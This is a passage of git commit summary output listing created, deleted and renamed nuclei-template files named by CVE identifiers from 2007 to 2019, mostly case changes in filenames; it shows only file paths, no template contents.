nuclei-templates/CVE-2007/CVE-2007-0885.yaml delete mode 100644 nuclei-templates/CVE-2007/cve-2007-0885.yaml rename nuclei-templates/CVE-2008/{cve-2008-4668.yaml => CVE-2008-4668.yaml} (100%) create mode 100644 nuclei-templates/CVE-2008/CVE-2008-5587.yaml rename nuclei-templates/CVE-2008/{cve-2008-6080.yaml => CVE-2008-6080.yaml} (100%) rename nuclei-templates/CVE-2008/{cve-2008-6222.yaml => CVE-2008-6222.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-2650.yaml => cve-2008-2650.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-4764.yaml => cve-2008-4764.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2008/cve-2008-5587.yaml rename nuclei-templates/CVE-2008/{CVE-2008-6172.yaml => cve-2008-6172.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-1496.yaml => CVE-2009-1496.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-2015.yaml => CVE-2009-2015.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-2100.yaml => CVE-2009-2100.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4202.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4679.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-5020.yaml rename nuclei-templates/CVE-2009/{CVE-2009-0545.yaml => cve-2009-0545.yaml} (100%) create mode 100644 nuclei-templates/CVE-2009/cve-2009-4202.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-4679.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-5020.yaml rename nuclei-templates/CVE-2010/{cve-2010-0219.yaml => CVE-2010-0219.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-0467.yaml => CVE-2010-0467.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0759.yaml rename nuclei-templates/CVE-2010/{cve-2010-0985.yaml => CVE-2010-0985.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1219.yaml => CVE-2010-1219.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1304.yaml rename nuclei-templates/CVE-2010/{cve-2010-1306.yaml => CVE-2010-1306.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1313.yaml => CVE-2010-1313.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1315.yaml => CVE-2010-1315.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1469.yaml => CVE-2010-1469.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1474.yaml => CVE-2010-1474.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1476.yaml => CVE-2010-1476.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1602.yaml => CVE-2010-1602.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1722.yaml => CVE-2010-1722.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1723.yaml => CVE-2010-1723.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1878.yaml => CVE-2010-1878.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1954.yaml => CVE-2010-1954.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1955.yaml => CVE-2010-1955.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1957.yaml => CVE-2010-1957.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1980.yaml => CVE-2010-1980.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2036.yaml => CVE-2010-2036.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2307.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2861.yaml rename nuclei-templates/CVE-2010/{cve-2010-2918.yaml => CVE-2010-2918.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-3426.yaml => CVE-2010-3426.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/CVE-2010-4239.yaml rename nuclei-templates/CVE-2010/{cve-2010-4977.yaml => CVE-2010-4977.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5286.yaml => CVE-2010-5286.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-0759.yaml rename nuclei-templates/CVE-2010/{CVE-2010-0942.yaml => cve-2010-0942.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-0944.yaml => cve-2010-0944.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1056.yaml => cve-2010-1056.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1304.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1305.yaml => cve-2010-1305.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1340.yaml => cve-2010-1340.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1352.yaml => cve-2010-1352.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1491.yaml => cve-2010-1491.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1494.yaml => cve-2010-1494.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1533.yaml => cve-2010-1533.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1601.yaml => cve-2010-1601.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1653.yaml => cve-2010-1653.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1658.yaml => cve-2010-1658.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1659.yaml => cve-2010-1659.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1715.yaml => cve-2010-1715.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1717.yaml => cve-2010-1717.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1871.yaml => cve-2010-1871.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1983.yaml => cve-2010-1983.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2034.yaml => cve-2010-2034.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2307.yaml rename nuclei-templates/CVE-2010/{CVE-2010-2682.yaml => cve-2010-2682.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2857.yaml => cve-2010-2857.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2861.yaml delete mode 100644 nuclei-templates/CVE-2010/cve-2010-4239.yaml rename nuclei-templates/CVE-2010/{CVE-2010-4719.yaml => cve-2010-4719.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-5278.yaml => cve-2010-5278.yaml} (100%) create mode 100644 nuclei-templates/CVE-2011/CVE-2011-5107.yaml delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-5181.yaml rename nuclei-templates/CVE-2011/{CVE-2011-0049.yaml => cve-2011-0049.yaml} (100%) rename nuclei-templates/CVE-2011/{CVE-2011-3315.yaml => cve-2011-3315.yaml} (100%) rename nuclei-templates/CVE-2011/{CVE-2011-4969.yaml => cve-2011-4969.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/CVE-2012-0392.yaml rename nuclei-templates/CVE-2012/{cve-2012-0996.yaml => CVE-2012-0996.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-1226.yaml rename nuclei-templates/CVE-2012/{cve-2012-4253.yaml => CVE-2012-4253.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4940.yaml create mode 100644 nuclei-templates/CVE-2012/CVE-2012-5687.yaml delete mode 100644 nuclei-templates/CVE-2012/cve-2012-0392.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-1226.yaml rename nuclei-templates/CVE-2012/{CVE-2012-3153.yaml => cve-2012-3153.yaml} (100%) mode change 100644 => 100755 create mode 100644 nuclei-templates/CVE-2012/cve-2012-4940.yaml delete mode 100644 nuclei-templates/CVE-2012/cve-2012-5687.yaml create mode 100644 nuclei-templates/CVE-2013/CVE-2013-1965.yaml rename nuclei-templates/CVE-2013/{cve-2013-3827.yaml => CVE-2013-3827.yaml} (100%) create mode 100644 nuclei-templates/CVE-2013/CVE-2013-7091.yaml delete mode 100644 nuclei-templates/CVE-2013/cve-2013-1965.yaml rename nuclei-templates/CVE-2013/{CVE-2013-5979.yaml => cve-2013-5979.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/cve-2013-7091.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-1203.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2323.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2383.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-2908.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-3120.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4535.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4561.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9606.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-9607.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-9609.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9614.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-9615.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-1203.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2323.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-2908.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-3120.yaml rename nuclei-templates/CVE-2014/{CVE-2014-3704.yaml => cve-2014-3704.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-6271.yaml => cve-2014-6271.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-6308.yaml => cve-2014-6308.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-9606.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-9607.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-9609.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-9614.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-9615.yaml create mode 100644 nuclei-templates/CVE-2015/CVE-2015-0554.yaml rename nuclei-templates/CVE-2015/{cve-2015-1503.yaml => CVE-2015-1503.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-2067.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-2166.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3224.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3337.yaml rename nuclei-templates/CVE-2015/{cve-2015-4050.yaml => CVE-2015-4050.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-4666.yaml rename nuclei-templates/CVE-2015/{cve-2015-5688.yaml => CVE-2015-5688.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/CVE-2015-6920.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-9304.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-9471.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-9498.yaml delete mode 100644 nuclei-templates/CVE-2015/cve-2015-0554.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-2067.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-2166.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3224.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3337.yaml rename nuclei-templates/CVE-2015/{CVE-2015-3897.yaml => cve-2015-3897.yaml} (100%) rename nuclei-templates/CVE-2015/{CVE-2015-4632.yaml => cve-2015-4632.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/cve-2015-4666.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000126.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000128.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000136.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000142.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000155.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-10872.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-10884.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-11085.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-2004.yaml rename nuclei-templates/CVE-2016/{cve-2016-3978.yaml => CVE-2016-3978.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/CVE-2016-4977.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-6210.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-7552.yaml rename nuclei-templates/CVE-2016/{CVE-2016-1555.yaml => cve-2016-1555.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/cve-2016-2004.yaml rename nuclei-templates/CVE-2016/{CVE-2016-3081.yaml => cve-2016-3081.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/cve-2016-4977.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-6210.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-7552.yaml rename nuclei-templates/CVE-2017/{cve-2017-1000028.yaml => CVE-2017-1000028.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-1000029.yaml => CVE-2017-1000029.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-10271.yaml => CVE-2017-10271.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-11586.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-12138.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-12149.yaml rename nuclei-templates/CVE-2017/{cve-2017-12583.yaml => CVE-2017-12583.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-12615.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-12635.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-12637.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-14524.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-14535.yaml rename nuclei-templates/CVE-2017/{cve-2017-14537.yaml => CVE-2017-14537.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-15944.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-17059.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-18634.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-5521.yaml rename nuclei-templates/CVE-2017/{cve-2017-5982.yaml => CVE-2017-5982.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-8917.yaml => CVE-2017-8917.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-9822.yaml rename nuclei-templates/CVE-2017/{CVE-2017-11444.yaml => cve-2017-11444.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-11586.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-12138.yaml delete mode 100755 nuclei-templates/CVE-2017/cve-2017-12149.yaml delete mode 100644 nuclei-templates/CVE-2017/cve-2017-12615.yaml delete mode 100644 nuclei-templates/CVE-2017/cve-2017-12635.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-12637.yaml delete mode 100644 nuclei-templates/CVE-2017/cve-2017-14524.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-14535.yaml rename nuclei-templates/CVE-2017/{CVE-2017-15363.yaml => cve-2017-15363.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-15647.yaml => cve-2017-15647.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/cve-2017-15944.yaml rename nuclei-templates/CVE-2017/{CVE-2017-16806.yaml => cve-2017-16806.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-18638.yaml => cve-2017-18638.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-5521.yaml rename nuclei-templates/CVE-2017/{CVE-2017-5631.yaml => cve-2017-5631.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-9791.yaml => cve-2017-9791.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/cve-2017-9822.yaml rename nuclei-templates/CVE-2018/{cve-2018-0101.yaml => CVE-2018-0101.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-0296.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000130.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000226.yaml rename nuclei-templates/CVE-2018/{cve-2018-1000533.yaml => CVE-2018-1000533.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000856.yaml rename nuclei-templates/CVE-2018/{cve-2018-10093.yaml => CVE-2018-10093.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-10230.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-10818.yaml rename nuclei-templates/CVE-2018/{cve-2018-10956.yaml => CVE-2018-10956.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11231.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-11709.yaml rename nuclei-templates/CVE-2018/{cve-2018-11776.yaml => CVE-2018-11776.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12054.yaml => CVE-2018-12054.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12296.yaml => CVE-2018-12296.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12300.yaml => CVE-2018-12300.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12613.yaml => CVE-2018-12613.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-1273.yaml rename nuclei-templates/CVE-2018/{cve-2018-1335.yaml => CVE-2018-1335.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-13379.yaml => CVE-2018-13379.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-14912.yaml => CVE-2018-14912.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15138.yaml => CVE-2018-15138.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15745.yaml => CVE-2018-15745.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16288.yaml => CVE-2018-16288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16670.yaml => CVE-2018-16670.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-16761.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-17207.yaml rename nuclei-templates/CVE-2018/{cve-2018-17254.yaml => CVE-2018-17254.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-17422.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-18264.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-18777.yaml rename nuclei-templates/CVE-2018/{cve-2018-18778.yaml => CVE-2018-18778.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19136.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19137.yaml rename nuclei-templates/CVE-2018/{cve-2018-19365.yaml => CVE-2018-19365.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19752.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19892.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19914.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19915.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-20009.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20010.yaml rename nuclei-templates/CVE-2018/{cve-2018-2392.yaml => CVE-2018-2392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-2628.yaml rename nuclei-templates/CVE-2018/{cve-2018-3238.yaml => CVE-2018-3238.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-6200.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-7543.yaml rename nuclei-templates/CVE-2018/{cve-2018-9995.yaml => CVE-2018-9995.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-0296.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-1000130.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-1000226.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-1000856.yaml rename nuclei-templates/CVE-2018/{CVE-2018-10201.yaml => cve-2018-10201.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-10230.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-10818.yaml rename nuclei-templates/CVE-2018/{CVE-2018-10822.yaml => cve-2018-10822.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-11231.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-1273.yaml rename nuclei-templates/CVE-2018/{CVE-2018-13980.yaml => cve-2018-13980.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-14064.yaml => cve-2018-14064.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-15640.yaml => cve-2018-15640.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-15657.yaml => cve-2018-15657.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-16059.yaml => cve-2018-16059.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-16133.yaml => cve-2018-16133.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-16716.yaml => cve-2018-16716.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-16761.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-17422.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18069.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-18264.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-18777.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19136.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19137.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19752.yaml rename nuclei-templates/CVE-2018/{CVE-2018-19753.yaml => cve-2018-19753.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-19892.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19914.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19915.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-20009.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20010.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-2628.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6008.yaml => cve-2018-6008.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-6200.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6910.yaml => cve-2018-6910.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-7719.yaml => cve-2018-7719.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-8033.yaml => cve-2018-8033.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-8715.yaml => cve-2018-8715.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-9161.yaml => cve-2018-9161.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-9205.yaml => cve-2018-9205.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-0230.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10232.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10717.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11370.yaml rename nuclei-templates/CVE-2019/{cve-2019-12314.yaml => CVE-2019-12314.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-12581.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-12593.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-12962.yaml rename nuclei-templates/CVE-2019/{cve-2019-13101.yaml => CVE-2019-13101.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-13573.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-14313.yaml rename nuclei-templates/CVE-2019/{cve-2019-15107.yaml => CVE-2019-15107.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15112.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-15116.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15713.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-16118.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-16219.yaml rename nuclei-templates/CVE-2019/{cve-2019-16313.yaml => CVE-2019-16313.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-16662.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-16996.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-17232.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17233.yaml rename nuclei-templates/CVE-2019/{cve-2019-17270.yaml => CVE-2019-17270.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-17382.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17506.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-17673.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-1821.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18371.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-19824.yaml rename nuclei-templates/{wordpress/CVE-2019-19985-4061.yaml => CVE-2019/CVE-2019-19985.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20141.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20209.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-20224.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-20360.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-25141.yaml rename nuclei-templates/CVE-2019/{cve-2019-2725.yaml => CVE-2019-2725.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-2767.yaml => CVE-2019-2767.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-3401.yaml rename nuclei-templates/CVE-2019/{cve-2019-3911.yaml => CVE-2019-3911.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-3912.yaml => CVE-2019-3912.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-3929.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-6112.yaml rename nuclei-templates/{wordpress/CVE-2019-6715-4187.yaml => CVE-2019/CVE-2019-6715.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-7192.yaml rename nuclei-templates/CVE-2019/{cve-2019-7238.yaml => CVE-2019-7238.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-7609.yaml => CVE-2019-7609.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-8449.yaml rename nuclei-templates/CVE-2019/{cve-2019-8903.yaml => CVE-2019-8903.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-9082.yaml => CVE-2019-9082.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9567.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-9618.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9912.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9922.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-0230.yaml rename nuclei-templates/CVE-2019/{CVE-2019-10068.yaml => cve-2019-10068.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-10232.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-10717.yaml rename nuclei-templates/CVE-2019/{CVE-2019-10758.yaml => cve-2019-10758.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-11043.yaml => cve-2019-11043.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-11370.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-12581.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-12593.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-12962.yaml rename nuclei-templates/CVE-2019/{CVE-2019-14312.yaml => cve-2019-14312.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-15859.yaml => cve-2019-15859.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16097.yaml => cve-2019-16097.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-16662.yaml rename nuclei-templates/CVE-2019/{CVE-2019-16759.yaml => cve-2019-16759.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-16996.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-17382.yaml rename nuclei-templates/CVE-2019/{CVE-2019-17418.yaml => cve-2019-17418.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-17503.yaml => cve-2019-17503.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-17506.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-1821.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18371.yaml rename nuclei-templates/CVE-2019/{CVE-2019-18393.yaml => cve-2019-18393.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-18394.yaml => cve-2019-18394.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-19781.yaml => cve-2019-19781.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-19824.yaml delete mode 100644 